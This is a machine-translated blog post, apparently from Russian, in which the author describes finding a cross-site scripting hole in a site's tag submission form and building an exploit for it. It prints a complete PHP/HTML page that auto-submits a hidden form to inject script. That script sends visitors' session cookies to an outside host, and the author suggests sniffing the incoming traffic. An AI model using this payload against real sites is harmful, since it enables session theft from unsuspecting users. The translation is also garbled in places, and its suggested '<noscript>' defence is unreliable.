wiki
記事からタイトルの2番目の部分を取りました。 面白いですね。
私はすでにページにシールを投稿し、プレビューボタンをクリックし、コンテンツの読み込みとブラウザが0.5秒ハングし、追加のすぐ下に私の投稿ボタンが表示されることを望んでいました。 [追加]をクリックすると、投稿用に少なくとも2つのタグを記述する必要があると言われました。 私は「かわいい猫」と入力しました-少し下に、人気のタグを拾うことができるブロックが再び現れました。 これは非常に優れていると判断し、コレクションにはこのようなスクリプトが必要です。 ためらうことなく、私はjavascriptページから引き裂き、開いて私の母国ロシア語のコードに関するコメントを見ました。
それは非常に退屈だったので、私の強さ、言語と仕様の知識をテストするために、管理者の許可を得て少しハックすることにしました。 全体の研究には2日、1日3〜4時間かかりました。
私はフォームをチェックして、何かを壊そうとするか、間違いか何かを見ることにしました。 SQLインジェクションなどのヒントではなく、かなり保護されていました。
jsファイルをチェックした後、いくつかの変数がクライアント側でまったくフィルターされず、フォームに挿入したページで任意のコードを実行できることがわかりました。 私が最初にしたことは、クラシックを挿入することでした。
<script>alert(1)</script>
天から窓が降りてきました。 それはこの世界のすべてが1だと言った。
私はこれが甘やかしていると言わなければなりません。 したがって、単純なxssがあります。 動揺しないでください-これで十分です。
フォームに貼り付けました
<script>window.eval = function(code){console.log(code)}</script>
ブラウザでエラーを読んだ後、<iframeにフォームを挿入し、他の人のサイトのウィンドウを確認し、紹介フィールドを確認し、ドメインを確認しました。要求し、私達は答えられます。
私がハッキングしたページにアクセスできるのは承認されたユーザーのみであり、フォームにコードを入力するだけで、リクエスト自体をサイト自体で表すことができます。
次に、ユーザーからCookieを送信する悪意のあるコードを提供します。これはscられないようにカスタマイズされます。 ページ上で自分のアクションを隠すコードのメイン部分は提供しません。ハックを自分で見せます。
1)攻撃されたものと同じエンコードでページを作成します。
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body> </body> </html>
ほとんど誰でもこれを処理できると思います。
2)被害者のブラウザからリクエストを送信するフォームを作成する必要があります
<iframe src="# " method="post"></iframe> <form action="# " method="POST"> <input type="hidden" name="# xss." value=" "/> </form>
3)フォームへの将来の送信のためにコードを暗号化します。
<?php $txt1 = "<script>var url='<img src=http://www1.hut.ru/testi.shtml?cookie='+document.cookie+'>';</script>"; $txt2 = "<script>document.write(url);</script>"; $txt11 = urlencode($txt1); $txt22 = urlencode($txt2); ?>
コードを別のドメインに正しく転送するために残っています。 urlencode();関数を使用しました。 関数の説明ページには、「この関数は、エンコードされた文字列がURLの一部としてリクエストで使用される場合に便利です。また、変数を他のページに転送する便利な方法です。」
4)ハッカーjsコード。
5)さて、ページをロードした後、すべてのデータをフォームに送信します。
さて、これですべてサーバーにアップロードできます。
6)トラフィック分析では、オンラインスニファーを実行できます。
完全にコードが判明したので <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body> <?php $txt1 = "var url='<img src=#c?cookie='+document.cookie+'>';"; $txt2 = "<script>document.write(url);</script>"; $txt11 = urlencode($txt1); $txt22 = urlencode($txt2); ?> <iframe src="# " method="post"></iframe> <form action="# " method="POST"> <input type="hidden" name="story_tags" value=" <script><?php echo $txt11 ;?></script> , <script><?php echo $txt22 ;?></script>"/> </form> <script> window.onload = function() {document.forms[0].submit()} </script> </body> </html>
その結果、誰かが私たちのサーバーに来て、彼のクッキーの中に私たちが必要とするサイトがあれば、すぐにそれらを同化します。 コードは議論または解析されるふりをせず、トレーニングモードです。 私の目標は、少なくとも1つの脆弱性を見つけるための火の洗礼でした。
タグでプレビューすることで、この攻撃から身を守ることができます
<noscript>
ps私は感謝し、日中に脆弱性を閉じました。